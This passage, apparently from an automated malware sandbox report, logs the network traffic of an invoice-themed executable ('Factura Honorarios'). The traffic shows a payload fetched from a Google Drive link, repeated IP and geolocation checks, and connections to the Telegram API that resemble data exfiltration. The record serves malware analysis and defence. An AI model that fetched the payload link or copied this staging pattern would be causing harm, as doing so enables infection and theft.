                                                                                                                                Nov 18, 2024 13:51:12.689306974 CET8049728193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:12.690433025 CET49729443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:12.690474033 CET44349729188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:12.690541029 CET49729443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:12.690774918 CET49729443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:12.690792084 CET44349729188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:12.729851961 CET4972880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:13.317492962 CET44349729188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:13.319021940 CET49729443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:13.319046974 CET44349729188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:13.473983049 CET44349729188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:13.474057913 CET44349729188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:13.474260092 CET49729443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:13.474688053 CET49729443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:13.584541082 CET4972880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:13.590856075 CET8049728193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:13.590930939 CET4972880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:13.593070984 CET49730443192.168.2.8149.154.167.220
                                                                                                                                Nov 18, 2024 13:51:13.593108892 CET44349730149.154.167.220192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:13.593170881 CET49730443192.168.2.8149.154.167.220
                                                                                                                                Nov 18, 2024 13:51:13.593560934 CET49730443192.168.2.8149.154.167.220
                                                                                                                                Nov 18, 2024 13:51:13.593570948 CET44349730149.154.167.220192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:14.434339046 CET44349730149.154.167.220192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:14.434708118 CET49730443192.168.2.8149.154.167.220
                                                                                                                                Nov 18, 2024 13:51:14.436702013 CET49730443192.168.2.8149.154.167.220
                                                                                                                                Nov 18, 2024 13:51:14.436713934 CET44349730149.154.167.220192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:14.436975956 CET44349730149.154.167.220192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:14.438407898 CET49730443192.168.2.8149.154.167.220
                                                                                                                                Nov 18, 2024 13:51:14.479336977 CET44349730149.154.167.220192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:14.674165964 CET44349730149.154.167.220192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:14.674237013 CET44349730149.154.167.220192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:14.674303055 CET49730443192.168.2.8149.154.167.220
                                                                                                                                Nov 18, 2024 13:51:14.682790995 CET49730443192.168.2.8149.154.167.220
                                                                                                                                Nov 18, 2024 13:51:20.905567884 CET4971680192.168.2.8193.122.6.168

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 18, 2024 13:50:45.519604921 CET5585853192.168.2.81.1.1.1
                                                                                                                                Nov 18, 2024 13:50:45.526700020 CET53558581.1.1.1192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:47.512814045 CET5984753192.168.2.81.1.1.1
                                                                                                                                Nov 18, 2024 13:50:47.519742966 CET53598471.1.1.1192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:53.560709953 CET6274253192.168.2.81.1.1.1
                                                                                                                                Nov 18, 2024 13:50:53.569175005 CET53627421.1.1.1192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.117856979 CET6287353192.168.2.81.1.1.1
                                                                                                                                Nov 18, 2024 13:50:56.125507116 CET53628731.1.1.1192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:13.585165024 CET5388453192.168.2.81.1.1.1
                                                                                                                                Nov 18, 2024 13:51:13.592521906 CET53538841.1.1.1192.168.2.8

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Nov 18, 2024 13:50:45.519604921 CET192.168.2.81.1.1.10x4b71Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:50:47.512814045 CET192.168.2.81.1.1.10x9620Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:50:53.560709953 CET192.168.2.81.1.1.10x3206Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:50:56.117856979 CET192.168.2.81.1.1.10xebd8Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:51:13.585165024 CET192.168.2.81.1.1.10x2cd7Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Nov 18, 2024 13:50:45.526700020 CET1.1.1.1192.168.2.80x4b71No error (0)drive.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:50:47.519742966 CET1.1.1.1192.168.2.80x9620No error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:50:53.569175005 CET1.1.1.1192.168.2.80x3206No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:50:53.569175005 CET1.1.1.1192.168.2.80x3206No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:50:53.569175005 CET1.1.1.1192.168.2.80x3206No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:50:53.569175005 CET1.1.1.1192.168.2.80x3206No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:50:53.569175005 CET1.1.1.1192.168.2.80x3206No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:50:53.569175005 CET1.1.1.1192.168.2.80x3206No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:50:56.125507116 CET1.1.1.1192.168.2.80xebd8No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:50:56.125507116 CET1.1.1.1192.168.2.80xebd8No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                Nov 18, 2024 13:51:13.592521906 CET1.1.1.1192.168.2.80x2cd7No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • drive.google.com
                                                                                                                                • drive.usercontent.google.com
                                                                                                                                • reallyfreegeoip.org
                                                                                                                                • api.telegram.org
                                                                                                                                • checkip.dyndns.org

                                                                                                                                HTTP Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.849711193.122.6.168807628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 13:50:53.580066919 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Nov 18, 2024 13:50:54.414751053 CET323INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:50:54 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 106
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 4ab9c707e1c18dd86eb0ff7c1892786c
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                                                                                                                Nov 18, 2024 13:50:54.421840906 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Nov 18, 2024 13:50:55.665736914 CET323INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:50:55 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 106
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: b41aef65e49aece2326e2994667c4dca
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                                                                                                                Nov 18, 2024 13:50:56.942181110 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Nov 18, 2024 13:50:59.186085939 CET323INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:50:59 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 106
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: eef5ace68c7aeb71f489de0bb2373f71
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.849716193.122.6.168807628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 13:50:59.985692978 CET127OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Nov 18, 2024 13:51:00.820605993 CET323INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:00 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 106
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: eb4bc0ff6868ee22ad6cfd936fd880c4
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.849718193.122.6.168807628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 13:51:01.592613935 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Nov 18, 2024 13:51:02.421680927 CET323INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:02 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 106
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: c4be3941fb14192f66ba4cd64da20e4d
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.849720193.122.6.168807628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 13:51:03.181866884 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Nov 18, 2024 13:51:05.026211023 CET323INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:04 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 106
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 006cd1952b5b97c1e319fb8c633f5b29
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.849722193.122.6.168807628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 13:51:05.805912018 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Nov 18, 2024 13:51:06.654702902 CET323INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:06 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 106
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 1981f7d7739cadd7f384abd043d4e82b
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.849724193.122.6.168807628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 13:51:07.420520067 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Nov 18, 2024 13:51:09.265789986 CET323INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:09 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 106
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 5d9af711c0c2be957744a0b298351a63
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.849726193.122.6.168807628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 13:51:10.022285938 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Nov 18, 2024 13:51:10.867541075 CET323INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:10 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 106
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 245faa9cf855025c561266724a556968
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.849728193.122.6.168807628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 13:51:11.848272085 CET151OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Nov 18, 2024 13:51:12.689306974 CET323INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 18 Nov 2024 12:51:12 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 106
                                                                                                                                Connection: keep-alive
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                X-Request-ID: 65921174a3c0402e27e6dc8916c8d7d5
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                                                                                                HTTPS Proxied Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.849709142.250.185.1744437628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-18 12:50:47 UTC216OUTGET /uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                Host: drive.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-11-18 12:50:47 UTC1610INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Mon, 18 Nov 2024 12:50:47 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'nonce-MrJe7-hTRxv16hdi8PFHjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.849710172.217.16.1934437628C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-18 12:50:48 UTC258OUTGET /download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-11-18 12:50:50 UTC4915INHTTP/1.1 200 OK
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Security-Policy: sandbox
                                                                                                                                Content-Security-Policy: default-src 'none'
                                                                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                X-Content-Security-Policy: sandbox
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Content-Disposition: attachment; filename="YUWtBaypnzkWs212.bin"
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Credentials: false
                                                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Content-Length: 275008
                                                                                                                                Last-Modified: Thu, 14 Nov 2024 21:35:51 GMT
                                                                                                                                X-GUploader-UploadID: AFiumC4HWxFb-XdJX552HMedwS5zS1PDSxBOJTl3ieKBp8T2PZ-1W_2JS1TMbtcaKhbuJi4MTvo
                                                                                                                                Date: Mon, 18 Nov 2024 12:50:50 GMT
                                                                                                                                Expires: Mon, 18 Nov 2024 12:50:50 GMT
                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                X-Goog-Hash: crc32c=II/sjQ==
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close
